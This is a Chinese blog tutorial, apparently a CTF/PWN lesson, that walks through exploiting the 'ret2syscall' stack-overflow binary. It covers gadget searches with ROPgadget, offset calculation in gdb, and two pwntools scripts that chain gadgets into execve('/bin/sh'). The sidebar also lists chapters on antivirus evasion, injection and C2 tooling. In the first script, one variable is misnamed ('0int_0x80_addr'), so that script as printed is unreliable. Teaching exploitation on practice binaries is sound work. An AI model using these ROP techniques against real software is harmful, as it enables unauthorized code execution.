onedaybook
  • 关于这个博客
  • C2工具原理分析
    • C2工具原理分析:从生成shellcode到上线CS服务器全过程
  • DevilC2工具开发
    • 关于这个项目
  • Rootkit工具开发
  • EvilLoader工具开发
  • 免杀
    • 问鼎免杀之路
      • 序言
      • 第一章-基础
        • 0-基础
        • 1-PE的相关数据结构
        • 2-WindowsAPI
        • 3-混淆加密
        • 4-特征修改
        • 5-分离
        • 6-转换
        • 7-保护
      • 第二章-执行与注入技术
        • 0-创建线程注入(CreateThread Injection)
        • 1-创建纤程注入(CreateFiber Injection)
        • 2-创建远程线程注入(CreateRemoteThread Injection)
        • 3-创建堆注入(HeapCreate Injection)
        • 4-创建线程池注入(CreateThreadpoolWait Injection)
        • 5-进程镂空注入(Process Hollowing Injection)
        • 6-DLL镂空注入(DLL Hollowing Injection)
        • 7-DLL劫持注入(涉及白加黑)
        • 8-映射注入(Mapping Injection)
        • 9-MapViewOfFile+NtMapViewOfSection
        • 10-挂钩注入(SetWindowsHookEx Injection)
        • 11-注册表注入
        • 12-设置上下文劫持注入(SetContext Hijack Injection)
        • 13-剪贴板注入(Clipboard Injection)
        • 14-突破session 0远程线程注入
        • 15-枚举RWX区域注入
        • 16-APC注入(APC Injection)
        • 17-APC & NtTestAlert Injection
        • 18-APC劫持
        • 19-Early Bird
        • 20-基于资源节加载shellcode
        • 21-内核回调表注入(KernelCallbackTable Injection)
        • 22-自举的代码幽灵——反射DLL注入(Reflective DLL Injection)
        • 23-内存申请总结
        • 24-移动或复制shellcode总结
        • 25-shellcode执行总结
      • 第三章-防御规避
        • 0-动态获取API函数(又称隐藏IAT)
        • 1-重写ring3 API函数
        • 2-自定义 String 哈希算法
      • 第四章-武器化
        • 0-Windows Shellcode开发
        • 1-Windows Shellcode开发(x86 stager)
        • 2-Windows Shellcode开发(x64 stager)
        • 3-Linux Shellcode开发(Stager & Reverse Shell)
        • 4-非PEB获取ntdll和kernel32模块基址的精妙之道
        • 5-从SRDI原理剖析再到PE2Shellcode的实现
      • 第五章-主动进攻
      • 第六章-社工钓鱼
    • 随笔
      • 0-用哥斯拉插件零基础免杀上线msf和cs
      • 1-新版RDI
      • 2-新新版RDI
  • 权限提升
  • 数字取证/应急响应
  • 工具二开
    • 哥斯拉二开
      • 环境准备
  • 代码审计
  • PWN
    • ret2text
    • ret2shellcode
    • ret2syscall
    • ret2libc1
    • ret2libc2
    • ret2libc3
Powered by GitBook
On this page
  1. PWN

ret2syscall

Previousret2shellcodeNextret2libc1

1、查看结构和保护措施

使用checksec <文件>查了架构和保护措施

几个方向:

没有PIE,ret2libc,ret2syscall

开启了NX保护,ret2libc,retsyscall

其他:ret2text

使用file <文件>查看链接方式

该文件属于静态链接(即在程序编译链接的过程中就将用到的库文件加入到可执行文件中),存在大量的可用的ROPgadget

gadget:代码小片段

ROPgadget:属于execve('/bin/sh',0,0)的代码小片段,结构是“pop-ret”。pop就是将存在栈的参数弹出给对应的寄存器,ret就是返回将存在栈中的返回地址弹出给ip寄存器。

ROP链:用代码小片段构造execve,这些小片段就构成了ROP链

构造的目标代码(execve):

mov eax,0xb

mov ebx,['/bin/sh']

mov ecx,0

mov edx,0

int 0x80

=>execve('/bin/sh',0,0)

给寄存器赋值不分先后。有时候一个ROPgadget可以同时给多个寄存器赋值,尽量选择这些gadget

2、使用ROPgadget工具寻找gadget

打开linux终端,输入:ROPgadget --binary <文件> --only "pop|ret" 寻找对应的gadget。

发现了大量的gadget

有时候,我们也用:ROPgadget --binary <文件> --only "pop|ret" |grep "pop eax" 来快速地寻找能够对相应寄存器赋值的gadget

eax的gadget

ebx的gadget

ecx的gadget

edx的gadget

“/bin/sh”的gadget

ROPgadget --binary <文件> --string “/bin/sh”

int 0x80的gadget

ROPgadget --binary <文件> --only "int"

3、寻找危险函数

  • 在main函数的汇编界面,按F5反编译成C语言代码

  • 分析main函数的主逻辑

    • setvbuf关闭缓冲区,不存在漏洞

    • puts函数不存在漏洞

    • gets函数向main函数的局部变量v4写入无限长的字节数据,存在漏洞!

4、计算偏移量

  • IDA静态分析得出:v4到ret_addr的距离为0x64+0x4=0x68(不推荐直接用IDA分析出来的结果,还是得通过gdb动态调试来验证IDA分析的结果是否正确)

  • gdb动态调试求偏移量

①gdb <文件>

②b mian 或者start进入到程序的入口(当面对较复杂时,在我们想要的位置上打断点,具体会在ret2libc3介绍)

③使用r命令,如果有断点,停在断点处;

各个窗口如图所示

④在“DISASM”反汇编窗口观察程序执行逻辑,输入ni,进行单步过操作

⑤一直步过到“gets函数”,我们不需要进入到gets函数的内部,此时终端处于等待用户输入的状态(规律:凡是库函数都不需要进入函数内部)

输入’aaaa‘,(根据程序的位数输入4位还是8位的数据),然后执行stack <数字>查看任意多行的栈空间的情况

观察’aaaa‘数据最后存放在0xffffd14c的位置上,这就是v4的地址,返回地址就是ebp的下一单元

⑥计算v4到ret_addr的偏移量

v4的地址:0xffffd14c

ret_addr的地址:0xffffd1bc(其实gdb已经告诉我们这个地址里的内容就是_libc_start_main函数的下一条指令:mov dword ptr [esp],eax 的地址)

使用gdb自带的计算距离的指令:distance <地址1> <地址2>

distance 0xffffd14c 0xffffd1bc

计算得出偏移量:0x70 bytes

5、编写exp

exp1

from pwn import *

io = process('./ret2syscall')

pop_eax_ret_addr = 0x080bb196

pop_ecx__ebx_ret_addr = 0x0806eb91

pop_edx_ret_addr =0x0806eb6a

bin_sh_addr = 0x080be408

0int_0x80_addr = 0x08049421

payload = flat([b'A'*0x70,pop_eax_ret_addr,0xb,pop_ecx__ebx_ret_addr,0,bin_sh_addr,pop_edx_ret_addr,0,int_0x80_addr])

io.sendline(payload)

io.interactive()

exp2

from pwn import *

io = process('./ret2syscall')

bin_sh = 0x080be408

pop_edx_ecx_ebx_ret = 0x0806eb90

pop_eax_ret = 0x080bb196

int_0x80 = 0x08049421

payload = flat([b'A'*112,pop_eax_ret,0xb,pop_edx_ecx_ebx_ret,0,0,bin_sh,int_0x80])

io.sendline(payload)

io.interactive()

.